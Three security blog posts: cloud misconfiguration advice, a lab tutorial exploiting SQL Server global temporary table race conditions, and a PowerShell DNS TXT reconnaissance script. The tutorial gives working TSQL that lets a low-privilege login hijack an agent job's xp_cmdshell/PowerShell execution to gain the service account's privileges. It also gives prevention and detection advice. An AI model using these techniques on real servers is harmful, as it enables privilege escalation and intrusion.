
Your Cloud Assets are Probably Not as Secure as You Think They Are

Despite a plethora of available tools and resources, there are still many ways to configure cloud services incorrectly. According to a Wall Street Journal article published earlier this year, research and advisory firm Gartner Inc. estimated that up to 95% of cloud breaches occur due to human errors such as configuration mistakes. Not surprisingly, there have been frequent public and private cloud breaches, even for organizations with significant resources and mature security programs.
So what can we do about it?

Based on many discussions with our clients, NetSPI has identified a number of common security issues that span different cloud platforms, environments, and even vertical markets:

  • Lack of multi-factor authentication – A cloud breach is often achieved through common vulnerabilities, public data exposures, and active credential guessing attacks, for example by enumerating a potential email address from a public data source and guessing its password. You may find it surprising that many cloud services do not enforce multi-factor authentication right out of the box.
  • Integration of cloud and on-premise networks – Integrating cloud and on-premise environments makes it easier to migrate resources, users, and accounts out to a cloud provider. However, it does increase risk, especially if federated authentication, shared user accounts, and the same Active Directory environment are used. This makes it much easier for attackers to pivot into traditional (often less secure) network resources once they have gained access to the cloud.
  • Poor permission configuration – Security can take a back seat when developers are trying to move quickly, and for the sake of simplicity accounts are often over-permissioned. This is a growing problem, in part because of the increasing popularity of public repositories and Internet services like GitHub for managing code and configurations, which has led to a rise in usernames and passwords being accidentally pasted to the Internet, where they can be leveraged by malicious actors.

How You Can Protect Yourself

With these issues in mind, what steps can you take to improve your cloud security? First, it’s important to practice proper cloud hygiene at the outset by: (a) clearly defining requirements, (b) isolating development, staging, and production environments, and (c) limiting privileges in all environments to guard against escalation by malicious actors.

Second, NetSPI recommends pentesting regularly and fully. This includes penetration testing all layers of your environment and using cloud configuration reviews to evaluate how well the security controls offered by your cloud provider are actually protecting your cloud application(s). Traditional penetration testing does not go deep enough when you are running cloud applications, which is why more rigorous cloud penetration testing is critical.

In addition to the common insights gained from an external penetration test, a cloud penetration test goes much further to include testing of cloud hosts and services. Internal network layer testing of virtual machines and services from the cloud virtual networks is included, as well as external network layer testing of externally exposed services. In addition, a configuration review of cloud services covers firewall rules, access controls (IAM/RBAC) for users/roles/groups/policies, and the cloud services in use (storage, databases, etc.).

Recommendations for Undertaking Cloud Penetration Testing

It’s clear that full and regular pentesting is a sure-fire way to improve the security of your applications and data residing in the cloud, and ultimately of your on-premise network if both environments are closely integrated. If you are planning on undertaking cloud penetration testing, NetSPI recommends the following best practices:

  • Ensure systems and services are updated and patched in accordance with industry/vendor recommendations
  • Verify that identity and access management (IAM) and role-based access control (RBAC) roles are assigned appropriately, are not over-permissioned, and do not allow for permission escalation
  • Use security groups and firewall rules to limit access between services and virtual machines
  • Ensure that sensitive information is not written in clear text to any cloud storage services and encrypt data prior to storage
  • Verify user permissions for any cloud storage containing sensitive data and ensure that the rules represent only the users who require access to the storage
  • Ensure only the appropriate parties have access to key material for decryption purposes

One Last Thought

As a security vendor, we hear statements every day like, “Cloud doesn’t change anything from a security perspective because it’s all the same stuff, just in a different place” or “My cloud provider takes care of security.” In the rush to embrace cloud and its advantages, some security best practices have fallen by the wayside. Now’s the time to refocus on securing assets by working proactively with your cloud services provider and cloud penetration testing regularly. The last thing you want is to be included in those ever-increasing cloud breach statistics.

Learn about NetSPI’s cloud penetration testing services for AWS, Azure, and Google Cloud.


Exploiting SQL Server Global Temporary Table Race Conditions

SQL Server global temporary tables usually aren’t an area of focus during network and application penetration tests.  However, they are periodically used insecurely by developers to store sensitive data and code blocks that can be accessed by unprivileged users.  In this blog, I’ll walk through how global temporary tables work, and share some techniques that we’ve used to identify and exploit them in real applications.

Lab Setup

  1. Install SQL Server. Most of the scenarios we’ll cover can be executed with SQL Server Express, but if you want to follow along with the case study you will need to use one of the commercial versions that supports agent jobs.
  2. Log into the SQL Server as a sysadmin.
  3. Create a least privilege login.
-- Create server login
CREATE LOGIN [basicuser] WITH PASSWORD = 'Password123!';

Img Create Login

What are Global Temporary Tables?

There are many ways to store data temporarily in SQL Server, but temporary tables seem to be one of the most popular methods. Based on what I’ve seen, there are three types of temporary tables commonly used by developers: table variables, local temporary tables, and global temporary tables. Each has its pros, cons, and specialized use cases, but global temporary tables tend to create the most risk, because they can be read and modified by any SQL Server user.  As a result, using global temporary tables often results in race conditions that can be exploited by least privilege users to gain unauthorized access to data and privileges.

How do Temporary Tables Work?

In this section I’ve provided a primer that covers how to create the three types of temporary tables, where they’re stored, and who can access them. To get us started let’s sign into SQL Server using our sysadmin login and review each of the three types of temp tables.

All of the temporary tables are stored in the tempdb database and can be listed using the query below.

SELECT *
FROM tempdb.sys.objects
WHERE name like '#%';

All users in SQL Server can execute the query above, but the access users have to the tables displayed depends largely on  the table type and scope.

Below is a summary of the scope for each type of temporary table.

Img Types Of Temp Tables
With that foundation in place, let’s walk through some TSQL exercises to help better understand each of those scope boundaries.

Exercise 1: Table Variables

Table variables are limited to a single query batch within the current user’s active session.  They’re not accessible to other query batches, or to other active user sessions. As a result, it’s not very likely that data would be leaked to unprivileged users.

Below is an example of referencing a table variable in the same batch.

-- Create table variable
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into table variable
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')

-- Query table variable in same batch 
SELECT * 
FROM @table_variable
GO

Img Table Variable Same Batch

We can see from the image above that we are able to query the table variable within the same query batch.  However, when we separate the table creation and the data selection into two batches using “GO”, the table variable is no longer accessible outside of its original batch.  Below is an example.

Img Table Variable Diff Batch
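For reference, a minimal sketch of that two-batch version is shown below; the second batch fails because the table variable only exists within the batch that declared it.

-- Batch 1: declare and populate the table variable
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
GO

-- Batch 2: the variable is out of scope here, so this SELECT fails with a "Must declare the table variable" error
SELECT * 
FROM @table_variable
GO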

Hopefully that helps illustrate the scope limitations of table variables, but you might still be wondering how they’re stored.  When you create a table variable it’s stored in tempdb using a name starting with a “#” and randomly generated characters.  The query below can be used to filter for table variables being used.

SELECT * 
FROM tempdb.sys.objects  
WHERE name not like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Exercise 2: Local Temporary Tables

Like table variables, local temporary tables are limited to the current user’s active session, but they are not limited to a single batch. For that reason, they offer more flexibility than table variables, but still don’t increase the risk of unintended data exposure, because other active user sessions can’t access them.  Below is a basic example showing how to create and access local temporary tables across different query batches within the same session.

-- Create local temporary table
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL)
CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records local temporary table
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query local temporary table
SELECT * 
FROM #LocalTempTbl
GO

Img Local Temp Table

As you can see from the image above, the table data can still be accessed across multiple query batches.  Similar to table variables, all custom local temporary tables need to start with a “#”.  Other than that, you can name them whatever you want.  They are also stored in the tempdb database, but SQL Server will append some additional information to the end of your table name so access can be constrained to your session.  Let’s see what our new table “#LocalTempTbl” looks like in tempdb with the query below.

SELECT * 
FROM tempdb.sys.objects 
WHERE name like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Img Local Temp Table

Above we can see that the table we created, “#LocalTempTbl”, had some additional session information appended to it.  All users can see that temp table name, but only the session that created it can access its contents.  It appears that the session id appended to the end increments with each session made to the server, and you can actually use the full name to query that table from within your session.  Below is an example.

SELECT * 
FROM tempdb..[ #LocalTempTbl_______________________________________________________________________________________________________000000000007]

Img Local Temp Table

However, if you attempt to access that temp table from another user’s session you get the following error.

Img Local Temp Table

Regardless, when you’re all done with the local temporary table it can be removed by terminating your session or explicitly dropping it using the example command below.

DROP TABLE #LocalTempTbl

Exercise 3: Global Temporary Tables

Ready to level up? Similar to local temporary tables, you can create and access global temporary tables from separate query batches. The big difference is that ALL active user sessions can view and modify global temporary tables.  Let’s take a look at a basic example below.

-- Create global temporary table
IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL)
CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records global temporary table
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query global temporary table
SELECT * 
FROM ##GlobalTempTbl
GO

Img Global Temp Table

Above we can see that we are able to query the global temporary table across different query batches. All custom global temporary tables need to start with “##”.  Other than that, you can name them whatever you want.  They are also stored in the tempdb database.  Let’s see what our new table “##GlobalTempTbl” looks like in tempdb with the query below.

SELECT * 
FROM tempdb.sys.objects 
WHERE (select len(name) - len(replace(name,'#',''))) > 1

Img Global Temp Table

You can see that SQL Server doesn’t append any session-related data to the table name like it does with local temporary tables, because it’s intended to be used by all sessions. Let’s sign into another session using the “basicuser” login we created to show that’s possible.
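The second session only needs to run something like the query below (a minimal sketch, assuming a new connection authenticated as “basicuser”).

-- Run from a separate session authenticated as basicuser;
-- global temporary tables are visible to all active sessions
SELECT * 
FROM ##GlobalTempTbl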

Img Global Temp Table

As you can see, if that global temporary table contains sensitive data it’s now exposed to all of the SQL Server users.

How do I Find Vulnerable Global Temporary Tables?

It’s easy to target Global Temp Tables when you know the table name, but most auditors and attackers won’t know where the bodies are buried.  So, in this section I’ll cover a few ways you can blindly locate potentially exploitable global temporary tables.

  • Review Source Code if you’re a privileged user.
  • Monitor Global Temporary Tables if you’re an unprivileged user.

Review Source Code

If you’re logged into SQL Server as a sysadmin or a user with other privileged roles, you can directly query the TSQL source code of agent jobs, stored procedures, functions, and triggers for each database. You should be able to filter the query results for the string “##” to identify global temporary table usage in the TSQL (see the example queries after the list below). With the filtered list in hand, you should be able to review the relevant TSQL source code and determine under which conditions the global temporary tables are vulnerable to attack.

Below are some links to TSQL query templates to get you started:

It’s worth noting that PowerUpSQL also supports functions that can be used to query for that information. Those functions include:

  • Get-SQLAgentJob
  • Get-SQLStoredProcedure
  • Get-SQLTriggerDdl
  • Get-SQLTriggerDml
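If you don’t have those templates handy, a rough TSQL sketch along the lines below can be used to search stored procedure, function, trigger, and agent job definitions for the “##” string. This is only a starting point, not the original templates, and the msdb queries assume you have rights to read the job tables.

-- Search stored procedure, function, and trigger definitions in the current database for "##"
SELECT o.type_desc, o.name
FROM sys.sql_modules m
JOIN sys.objects o ON m.object_id = o.object_id
WHERE m.definition LIKE '%##%'

-- Search agent job step commands for "##"
SELECT j.name AS job_name, s.step_name
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON j.job_id = s.job_id
WHERE s.command LIKE '%##%'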

It would be nice if we could always just view the source code, but the reality is that most attackers won’t have sysadmin privileges out of the gate.  So, when you find yourself in that position it’s time to change your approach.

Monitor Global Temporary Tables

Now let’s talk about blindly identifying global temporary tables from a least privilege perspective.  In the previous sections, we showed how to list temporary table names and query their contents. However, we didn’t have easy insight into the columns.  So below I’ve extended the original query to include that information.

-- List global temp tables, columns, and column types
SELECT t1.name as 'Table_Name',
       t2.name as 'Column_Name',
       t3.name as 'Column_Type',
       t1.create_date,
       t1.modify_date,
       t1.parent_object_id       
FROM tempdb.sys.objects AS t1
JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

If you didn’t DROP “##GlobalTempTbl”, then you should see something similar to the results below when you execute the query.

Img Global Temp Table

Running the query above provides insight into the global temporary tables being used at that moment, but it doesn’t help us monitor for their use over time.  Remember, temporary tables are commonly only used for a short period of time, so you don’t want to miss them.

The query below is a variation of the first query, but will provide a list of global temporary tables every second.  The delay can be changed by modifying the “WAITFOR” statement, but be careful not to overwhelm the server.  If you’re not sure what you’re doing, then this technique should only be practiced in non-production environments.

-- Loop
While 1=1
BEGIN
    SELECT t1.name as 'Table_Name',
           t2.name as 'Column_Name',
           t3.name as 'Column_Type',
           t1.create_date,
           t1.modify_date,
           t1.parent_object_id       
    FROM tempdb.sys.objects AS t1
    JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
    JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
    WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

    -- Set delay
    WaitFor Delay '00:00:01'
END

Img Global Temp Table

As you can see, the query will provide a list of table names and columns that we can use in future attacks, but we may also want to monitor the contents of the global temporary tables to understand what our options are. Below is an example, but remember to use “WAITFOR” to throttle your monitoring when possible.

-- Monitor contents of all Global Temp Tables 
-- Loop
WHILE 1=1
BEGIN
    -- Add delay if required
    WAITFOR DELAY '0:0:1'
    
    -- Setup variables
    DECLARE @mytempname varchar(max)
    DECLARE @psmyscript varchar(max)

    -- Iterate through all global temp tables 
    DECLARE MY_CURSOR CURSOR 
        FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
    OPEN MY_CURSOR
    FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    WHILE @@FETCH_STATUS = 0
    BEGIN 

        -- Print table name
        PRINT @mytempname 

        -- Select table contents
        DECLARE @myname varchar(max)
        SET @myname = 'SELECT * FROM [' + @mytempname + ']'
        EXEC(@myname)

        -- Next record
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    END
    CLOSE MY_CURSOR
    DEALLOCATE MY_CURSOR
END

Img Global Temp Table

As you can see, the query above will monitor for global temp tables and display their contents.  That technique is a great way to blindly dump potentially sensitive information from global temporary tables, even if they only exist for a moment.  However, sometimes you may want to modify the contents of the global temp tables too.  We already know the table and column names. So, it’s pretty straightforward to monitor for global temp tables being created and update their contents.  Below is an example.

-- Loop forever
WHILE 1=1 
BEGIN    
    -- Select table contents
    SELECT * FROM ##GlobalTempTbl

    -- Update global temp table contents
    DECLARE @mycommand varchar(max)
    SET @mycommand = 'UPDATE t1 SET t1.SpyName = ''Inspector Gadget'' FROM ##GlobalTempTbl  t1'        
    EXEC(@mycommand)    
END

Img Global Temp Table

As you can see, the table was updated. However, you might still be wondering, “Why would I want to change the contents of the temp table?”.  To help illustrate the value of the technique I’ve put together a short case study in the next section.

Case Study: Attacking a Vulnerable Agent Job

Now for some real fun.  Below we’ll walk through the vulnerable agent job’s TSQL code and I’ll highlight where the global temporary tables are being used insecurely.  Then we’ll exploit the flaw using the previously discussed techniques. To get things started, download and run this TSQL script as a sysadmin to configure the vulnerable agent jobs on the SQL Server instance.

Vulnerable Agent Job Walkthrough

The agent will execute the TSQL job every minute and perform the following process:

  1. The job generates an output file path for the PowerShell script that will be executed later.
    -- Set filename for PowerShell script
    Set @PsFileName = ''MyPowerShellScript.ps1''
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY(''ErrorLogFileName'')) as VARCHAR(MAX)),''ERRORLOG'','''')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
  2. The job creates a string variable called “@MyPowerShellCode” to store the PowerShell script. The PowerShell code simply creates the file “C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\intendedoutput.txt” containing the string “hello world”.
    -- Define the PowerShell code
    SET @MyPowerShellCode = ''Write-Output "hello world" | Out-File "'' +  @TargetDirectory + ''intendedoutput.txt"''

    Pro Tip: The SQL Server and agent service accounts always have write access to the log folder of the SQL Server installation. Sometimes it can come in handy during offensive operations. You can find the log folder with the query below:

    SELECT SERVERPROPERTY('InstanceDefaultLogPath')
  3. The “@MyPowerShellCode” variable that contains the PowerShell code is then inserted into a randomly named Global Temporary Table. This is where it all starts to go wrong for the developer, because the second that table is created any user can view and modify it.
    -- Create a global temp table with a unique name using dynamic SQL 
    SELECT  @MyGlobalTempTable =  ''##temp'' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000))
    
    -- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table
    SELECT  @Command = ''
            CREATE TABLE ['' + @MyGlobalTempTable + ''](MyID int identity(1,1), PsCode varchar(MAX)) 
            INSERT INTO  ['' + @MyGlobalTempTable + ''](PsCode) 
            SELECT @MyPowerShellCode''
    
    -- Execute that command 
    EXECUTE sp_ExecuteSQL @command, N''@MyPowerShellCode varchar(MAX)'', @MyPowerShellCode
  4. Xp_cmdshell is then used to execute bcp on the operating system. Bcp (the Bulk Copy Program) is a bulk import/export utility that ships with SQL Server.  In this case, it’s being used to connect to the SQL Server instance as the SQL Server service account, select the PowerShell code from the global temporary table, and write the PowerShell code to the file path defined in step 1.
    -- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1
    SELECT @Command = ''bcp "SELECT PsCode from ['' + @MyGlobalTempTable + '']'' + ''" queryout "''+ @PsFilePath + ''" -c -T -S '' + @@SERVERNAME

    -- Write the file
    EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT
  5. Next, xp_cmdshell is used again to execute the PowerShell script that was just written to disk.
    -- Run the PowerShell script
    DECLARE @runcmdps nvarchar(4000)
    SET @runcmdps = ''Powershell -C "$x = gc ''''''+ @PsFilePath + '''''';iex($X)"''
    EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT
  6. Finally, xp_cmdshell is used one last time to remove the PowerShell script.
    -- Delete the PowerShell script
    DECLARE @runcmddel nvarchar(4000)
    SET @runcmddel= ''DEL /Q "'' + @PsFilePath +''"''
    EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT

Vulnerable Agent Job Attack

Now that our vulnerable agent job is running in the background, let’s log in using our least privilege user “basicuser” to conduct our attack. Below is a summary of the attack.

  1. First, let’s see if we can discover the global temporary table name using our monitoring query from earlier. This monitoring script is throttled. I do not recommend removing the throttle in production: it tends to consume a lot of CPU, and that will set off alarms, because DBAs tend to monitor the performance of their production servers pretty closely. You’re much more likely to get caught causing 80% utilization on the server than you are executing xp_cmdshell.
    -- Loop
    While 1=1
    BEGIN
        SELECT t1.name as 'Table_Name',
               t2.name as 'Column_Name',
               t3.name as 'Column_Type',
               t1.create_date,
               t1.modify_date,
               t1.parent_object_id       
        FROM tempdb.sys.objects AS t1
        JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
        JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
        WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
    
        -- Set delay
        WAITFOR DELAY '00:00:01'
    END

    The job runs every minute, so you may have to wait up to 59 seconds (or you can manually run the job in the lab), but eventually you should see something similar to the output below.
    Img Case Study Gtt

  2. In this example, the table name “##temp800845” looks random, so we try monitoring again and get the table name “##103919”. It has a different name, but it has the same columns.  That’s enough information to get us moving in the right direction.
    Img Case Study Gtt
  3. Next, we want to take a look at the contents of the global temporary table before it gets removed. However, we don’t know what the table name will be.  To work around that constraint, the query below will display the contents of every global temporary table.
    -- Monitor contents of all Global Temp Tables 
    -- Loop
    While 1=1
    BEGIN
        -- Add delay if required
        WAITFOR DELAY '00:00:01'
        
        -- Setup variables
        DECLARE @mytempname varchar(max)
        DECLARE @psmyscript varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN 
    
            -- Print table name
            PRINT @mytempname 
    
            -- Select table contents
            DECLARE @myname varchar(max)
            SET @myname = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@myname)
    
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END

    Img Case Study Gtt A
    From here we can see that the global temporary table is actually housing PowerShell code. From that, we can guess that it’s being executed at some point down the line. So, the next step is to modify the PowerShell code before it gets executed.

  4. Once again, we don’t know what the table name is going to be, but we do know the column names. So we can modify our query from step 3 and UPDATE the contents of the global temporary table rather than simply selecting its contents. In this case, we’ll be changing the output path defined in the code from “C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\intendedoutput.txt” to “C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\finishline.txt”.  However, you could replace the code with your favorite PowerShell shellcode runner or whatever arbitrary commands bring sunshine into your day.
    -- Create variables
    DECLARE @PsFileName NVARCHAR(4000)
    DECLARE @TargetDirectory NVARCHAR(4000)
    DECLARE @PsFilePath NVARCHAR(4000)
    
    -- Set filename for PowerShell script
    Set @PsFileName = 'finishline.txt'
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY('ErrorLogFileName')) as VARCHAR(MAX)),'ERRORLOG','')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
    
    -- Loop forever 
    WHILE 1=1 
    BEGIN    
        -- Set delay
        WAITFOR DELAY '0:0:1'
    
        -- Setup variables
        DECLARE @mytempname varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN         
            -- Print table name
            PRINT @mytempname 
        
            -- Update contents of known column with ps script in an unknown temp table    
            DECLARE @mycommand varchar(max)
            SET @mycommand = 'UPDATE t1 SET t1.PSCode = ''Write-Output "hello world" | Out-File "' + @PsFilePath + '"'' FROM ' + @mytempname + '  t1'
            EXEC(@mycommand)    
    
            -- Select table contents
            DECLARE @mycommand2 varchar(max)
            SET @mycommand2 = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@mycommand2)
        
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname  
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END

    Img Case Study Gtt
    As you can see from the screenshot above, we were able to update the temporary table contents with our custom PowerShell code. To confirm that we beat the race condition, verify that the “C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\finishline.txt” file was created.
    Note: Your path may be different if you’re using a different version of SQL Server.
    Img Case Study Gtt

Tada! In summary, we leveraged the insecure use of global temporary tables in a TSQL agent job to escalate privileges from a least privilege SQL Server login to the Windows operating system account running the SQL Server agent service.

What can I do about it?

Below are some basic recommendations based on a little research, but please reach out if you have any thoughts.  I would love to hear how other folks are tackling this one.

Prevention

  1. Don’t run code blocks that have been stored in a global temporary table.
  2. Don’t store sensitive data or code blocks in a global temporary table.
  3. If you need to access data across multiple sessions, consider using memory-optimized tables instead (see the sketch below). Based on my lab testing, they can provide similar performance benefits without having to expose data to unprivileged users. For more information check out this article from Microsoft.
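Below is a minimal sketch of that idea. It assumes the database already has a MEMORY_OPTIMIZED_DATA filegroup configured, and the table name is just an example; the point is that, unlike a global temporary table, access to a regular memory-optimized table can be restricted with standard object permissions.

-- Sketch: a non-durable memory-optimized table as a session-spanning alternative to a global temp table
-- (assumes the database already has a MEMORY_OPTIMIZED_DATA filegroup)
CREATE TABLE dbo.SpyStaging
(
    Spy_id   INT NOT NULL PRIMARY KEY NONCLUSTERED,
    SpyName  NVARCHAR(100) NOT NULL,
    RealName NVARCHAR(100) NULL
)
WITH (MEMORY_OPTIMIZED = ON, DURABILITY = SCHEMA_ONLY);

-- Unlike global temp tables, normal permissions apply, so unprivileged users can be locked out
-- (assumes a database user mapped to the basicuser login exists in this database)
DENY SELECT, INSERT, UPDATE, DELETE ON dbo.SpyStaging TO [basicuser];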

Detection

At the moment, I don’t have a great way to monitor for potentially malicious global temporary table access.  However, if an attacker is monitoring global temporary tables too aggressively the CPU should spike and you’ll likely see their activity in the list of expensive queries.  From there, you should be able to track down the offending user using the session_id and a query similar to:

SELECT 
    status,
    session_id,
    login_time,
    last_request_start_time,
    security_id,
    login_name,
    original_login_name
FROM [sys].[dm_exec_sessions]

Wrap Up

In summary, using global temporary tables can result in race conditions that can be exploited by least privilege users to read and modify the associated data. Depending on how that data is being used it can have some pretty big security implications.  Hopefully the information is useful to the builders and breakers out there trying to make things better. Either way, have fun and hack responsibly.



Analyzing DNS TXT Records to Fingerprint Online Service Providers

DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company.

In this blog I’ll walk through how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint.

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”.

Below is an outline of how that process typically works:

  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.

It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using.

Note: The domain validation process doesn’t always require a DNS TXT entry.  Some online service providers simply request that you upload a text file containing the domain validation token to the webroot of the domain’s website.  For example, https://mywebsite.com/validation_12345.txt.  Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites.  I used a slightly older list, but for those looking to mine that information on a recurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security-focused tools like dnsrecon.  I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites.

Below is the basic collection script I used.

# Import list of domains
$Domains = gc c:\temp\domains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:

  1. Removed remaining SPF records
  2. Parsed key/value pairs (see the parsing sketch after this list)
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts
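For steps 2 and 3, a rough PowerShell sketch like the one below can handle the key/value parsing and grouping. It assumes the $Results variable produced by the collection script earlier (name and txtstring columns), and the splitting logic is only an approximation, since providers format their tokens differently.

# Sketch: parse the domain validation tokens into key/value pairs and group by key
# Assumes $Results from the earlier collection script (columns: name, txtstring)
$Tokens = $Results | ForEach-Object {
    # Split on the first "=" or ":" to separate the token key from its value
    $parts = $_.txtstring -split '[=:]', 2
    [pscustomobject]@{
        Domain   = $_.name
        TokenKey = $parts[0].Trim()
        Value    = if ($parts.Count -gt 1) { $parts[1].Trim() } else { '' }
    }
}

# Group by token key to see which providers show up most often
$Tokens | Group-Object TokenKey |
    Sort-Object Count -Descending |
    Select-Object Count, Name -First 25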

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation.

Below are the top 5 categories:

 PLACE CATEGORY
1 Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
2 Certificate Authorities like globalsign were a close second.
3 Electronic Document Signing like Adobe sign and Docusign hang around third place.
4 Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
